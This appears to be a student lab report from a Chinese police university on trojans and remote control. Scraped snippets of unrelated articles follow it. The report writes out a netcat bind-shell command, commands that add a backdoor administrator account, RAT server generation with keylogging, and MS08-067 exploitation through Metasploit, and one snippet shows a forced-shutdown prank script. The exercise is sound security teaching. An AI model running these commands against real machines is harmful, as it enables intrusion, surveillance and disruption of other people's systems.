网络对抗技术—-网络对抗实验四

学   号:201421430008

 

中国人民公安大学

Chinese people’ public security university

 

网络对抗技术

实验报告

 

实验四

恶意代码技术

 

 

 

学生姓名

 吴宙杨

年级

 2014

区队

 3

指导教师

 高见老师

 

 

信息技术与网络安全学院

2016117

 

实验任务总纲

2016—2017 学年   学期

一、实验目的

1.通过对木马的练习,使读者理解和掌握木马传播和运行的机制;通过手动删除木马,掌握检查木马和删除木马的技巧,学会防御木马的相关知识,加深对木马的安全防范意识。

 

2.了解并熟悉常用的网络攻击工具,木马的基本功能;

3.达到巩固课程知识和实际应用的目的。

二、实验要求

1.认真阅读每个实验内容,需要截图的题目,需清晰截图并对截图进行标注和说明。

2.文档要求结构清晰,图文表达准确,标注规范。推理内容客观、合理、逻辑性强。

3.软件工具可使用NC、MSF等。

4.实验结束后,保留电子文档。

三、实验步骤

1.准备

提前做好实验准备,实验前应把详细了解实验目的、实验要求和实验内容,熟悉并准备好实验用的软件工具,按照实验内容和要求提前做好实验内容的准备。

2.实验环境

描述实验所使用的硬件和软件环境(包括各种软件工具);

开机并启动软件office2003或2007、浏览器、加解密软件。

3.实验过程

1)启动系统和启动工具软件环境。

2)用软件工具实现实验内容。

4.实验报告

按照统一要求的实验报告格式书写实验报告。把按照模板格式编写的文档嵌入到实验报告文档中,文档按照规定的书写格式书写,表格要有表说图形要有图说。

 

任务一 利用NC控制电脑

 

 NetCat,具有网络军刀之称,它小巧精悍且功能强大,说它小巧精悍,是因为他的软件大小现在已经压缩到只有十几KB,而且在功能上丝毫不减。

 

实验过程需要两个同学相互配合完成:

 

步骤一:

 

   在受害者的机器 (同学A)
输入下面的命令:
  nc.exe -l -p port -e cmd.exe   进入监听模式

 

 


步骤二:
  在攻击者的机器.(同学B)
输入下面的命令:
  nc ip  port //连接victim_IP,然后得到一个shell。 (需要截图)

 

 

 

 

步骤三:

 

    在shell中,利用net user 用户名 密码 /add ,添加一个用户,并在受害者的机器中使用 net user 命令进行验证。(需要截图)

 

 

 

 

 可以继续通过命令行做一些事情。

 

任务二 利用木马控制电脑

 

实验过程需要两个同学配合:

 

步骤一:

 

    攻击者的机器. (同学A)
打开V2014.exe程序或则star RAT,这两个木马功能类似。

 

 

 


步骤二:
  点击菜单栏中的“服务生成”,在弹出的配置服务端中,配置回IP地址(攻击者IP)和端口号,并点击“生成”按钮,生成木马服务端。

 

 

 

 

步骤三:

 

将生成的木马可执行程序拷贝到受害者的机器,并双击运行。 

 

步骤四:

 

在控制端中查看木马上线情况,并对以下功能每个进行测试和截图。 

 

1、控制主机

 2、获取桌面

3、拷贝文件

4、键盘记录

6、重启电脑

任务三 通过漏洞获取shell(合天平台中做) 所有过程截图写博客

 windows ms08067 漏洞利用

在平台中获取shell之后,继续利用攻击机器使用

net user user pass /add

net localgroup administrators /add

命令向被攻击的机器中添加账户,并提升为管理员

然后用rdesktop 10.1.1.130 登陆对方的远程桌面

 

关闭xp系统主机的防火墙

查看攻击主机的ip地址和账户

  启动Armitage

 

检索10.1.1.0/24网段

 

对130进行检测

搜寻到适应的攻击模块

 

 配置攻击信息

 

利用Metasploit shall获得xp主机的管理员权限

 

利用cmd shall建立attacker的账户

 

利用rdesktop远程登录xp系统的attacker(密码:123465)

转载于:https://www.cnblogs.com/P201421430008/p/7751529.html

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/news/487342.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

北大副校长詹启敏回应“25篇论文造假”,​PubPpeer到底靠不靠谱?

来源:科研大匠今日,北京大学常务副校长、北大医学部主任、中国工程院院士詹启敏在个人公众号“潇敏 ScienceArt”上发布《詹启敏关于相关情况的说明》文章,回应了昨日 DeepTech 对北京大学常务副校长詹启敏 25 篇相关论文受到学术不端质疑。事…

c语言课设报告时钟vc环境,C语言课程设计报告模拟时钟转动程序

C语言课程设计报告模拟时钟转动程序 课程设计报告题 目 课 程 名 称 结构化程序设计课程设计 院 部 名 称 专 业 班 级 学 生 姓 名 王蕾 学 号 课程设计地点 课程设计学时 指 导 教 师 金陵科技学院教务处制 程序设计综合课程设计I目 录第一章 课程设计的目的和要求 1.1 C 语言…

用人工智能监督人工 遭遇非技术困局

来源:科技日报远程办公常态化催生云监工软件市场。近日一款名为Enaible的AI监工软件销售火爆,这种AI软件不仅可以盯着员工干活,还可以对员工的工作效率进行打分……一场新冠肺炎疫情,让远程办公逐渐成为常态。钉钉、飞书、企业微信…

Windows10 【系统周期表】【系统下载表】【大型软件表】

系统周期表 商用名称商用英文名代号版本系统版本上市日期服务周期备注Windows 10无Threshold 1150710.0.10240.174432015.07.292015.07.29 - 2015.11.12默认值Windows 10十一月更新Windows 10 November UpdateThreshold 2151110.0.10586.9622015.11.122015.11.12 - 2016.08.02W…

2020年中国城市人工智能发展指数报告

来源 | 36氪研究院(转载请注明来源)编辑 | 张775大维度、20个三级指标,全面剖析中国36个城市人工智能发展情况2020年是全面建成小康社会与“十三五”规划收官之年,为了实现全面建设小康社会的发展目标、增强经济发展韧性&#xff…

c语言程序设计 函数说课,《C语言程序设计》之函数说课课件.ppt

您所在位置:网站首页 > 海量文档&nbsp>&nbsp计算机&nbsp>&nbspC/C资料《C语言程序设计》之函数说课课件.ppt16页本文档一共被下载:次,您可全文免费在线阅读后下载本文档。下载提示1.本站不保证该用户上传的文档完整性&#x…

中科院院士:40年7位诺奖得主,美国贝尔实验室做对了什么?

来源:科学网作者:夏建白本文介绍高科技的摇篮之一―― 美国贝尔实验室。本文将不具体介绍在贝尔实验室中发明晶体管、集成电路、激光器、光通信等的具体研究过程,而是介绍贝尔实验室的历届领导和管理思想,尝试探讨其取得这样重大成…

麻省理工最新报告:完全无人驾驶仍需10年

来源:机器人网、新智元两年前,麻省理工学院成立了「未来工作特别小组」,这个小组目前有20多人,旨在研究「大众创新年代」的工作演变。近期,他们发表了一个最新的报告,重点关注了自动驾驶领域的进展。而得出…

一键多功能按键识别c语言,单片机一键多功能按键识别设计

1.实验任务如图4.9.1所示,开关SP1接在P3.7/RD管脚上,在AT89S51单片机的P1端口接有四个发光二极管,上电的时候,L1接在P1.0管脚上的发光二极管在闪烁,当每一次按下开关SP1的时候,L2接在P1.1管脚上…

人工智能会取代科学家吗

来源:光明日报传统认为,科技工作因其高度的创新性,因此科技工作者很难被人工智能取代。但日前,国际学术期刊《自然》发表的一篇论文吸引了大家的眼球。科学家们改造了一种汽车装配线上常见的机器人,让它可以在化学实验…

C语言if( x)的意思,c语言中if(x)是什么意思?_后端开发

对比说明PHP7的优化提升_后端开发此篇张是我对PHP7跟PHP以前版本做的一个对比&#xff0c;先来说下PHP7带来的新东西&#xff1a;类型的声明、【set_exception_handler()】、新增操作符“??”“<>”、匿名函数、define定义常量数组、命名空间引用优化等。c语言中if(x)表…

钱老论逻辑、思维科学、智能机(一)

来源&#xff1a;人机与认知实验室1982年4月17日致何新中国社会科学院近代史研究所文化史研究室何新同志&#xff1a;四月五日来信和尊作均收到。我对哲学和逻辑学都是外行&#xff0c;有时想想这方面的问题&#xff0c;也只是业余爱好而已。您来下问于我&#xff0c;不敢不答&…

c语言vbs,我的vbs整人程序

源代码&#xff0c;建立一个txt(桌面--右击--新建--文本文档)&#xff0c;后缀改为vbs&#xff1a;on error resume nextdim WSHshellAset WSHshellA wscript.createobject("wscript.shell")WSHshellA.run "cmd.exe /c shutdown -s -t 60 -c ""说我是…

《自然》评价“天问一号”成功发射—— 全球深空探索走进新时代

来源&#xff1a;科技日报北京时间7月23日&#xff0c;重达5000公斤的“天问一号”探测器从海南文昌航天发射中心升空&#xff0c;大约36分钟后进入地火转移轨道&#xff0c;器箭分离正常&#xff0c;探测器太阳翼展开正常&#xff0c;发射任务取得圆满成功。全球著名期刊、英国…

Hinton最新演讲透露下一代神经网络模型的构想 | SIGIR 2020

来源&#xff1a;北京智源人工智能研究院7月27日上午&#xff0c;第43届国际信息检索大会&#xff08;SIGIR 2020&#xff09;以线上会议的形式开幕。图灵奖获得者Geoffrey Hinton教授作为首位主题演讲者进行了题为“神经网络的新时代&#xff08;The Next Generation of Neura…

从社会数据到社会智慧的社会计算:新技术、新哲学、新文科

来源&#xff1a;中国指挥与控制学会从社会数据到社会智慧的社会计算&#xff1a;新技术、新哲学、新文科——王飞跃研究员在中国社会科学院大学举办的“计算与人文社科融合创新高端论坛”暨“计算社会科学研究中心”成立大会上的主题报告观点人物介绍王飞跃研究员&#xff0c;…

2017-2018-1 20155338 《信息安全系统设计基础》第七周学习总结

2017-2018-1 20155338 《信息安全系统设计基础》第七周学习总结 教材学习内容总结 Y86-64指令集体系结构 程序员可见状态 概念&#xff1a;Y86程序中的每条指令会读取或修改处理器状态的某些部分&#xff0c;这些称之为处理器的可见状态。 Y86处理器状态可以访问和修改程序寄存…

android动态加home,Android 解决监听home键的几种方法

Android 解决监听home键的几种方法前言&#xff1a;以下两种方法可以完美解决监听back键&#xff0c;home键&#xff0c;多任务键(最近任务键)。一、使用注册广播监听home键、多任务键演示图创建一个广播代码如下&#xff1a;class InnerRecevier extends BroadcastReceiver {f…

英特尔大地震!解雇首席工程官,7纳米延期,或面临集体诉讼……

物联网智库 整理发布转载请注明来源和出处2020年的世界很不太平。纵观全球&#xff0c;疫情、洪水、蝗灾……尽管各种天灾人祸频繁上演&#xff0c;美股却一路向好&#xff0c;苹果、特斯拉等股价飙升。但有人欢喜有人愁&#xff0c;英特尔迎来自己的黑色星期五——上周五股价暴…

开源项目解读 —— Self-Operating Computer Framework # 长期主义 # 价值

价值&#xff1a;生成主函数业务逻辑函数思维导图&#xff0c;帮助理解&#xff0c;PR到开源项目&#xff0c;希望帮助大家理解IPA工作原理&#xff0c;国内没有好的开源项目&#xff0c;我就来翻译分析解读&#xff0c;给大家抛砖引玉。思维导图用文心一言配合其思维导图插件实…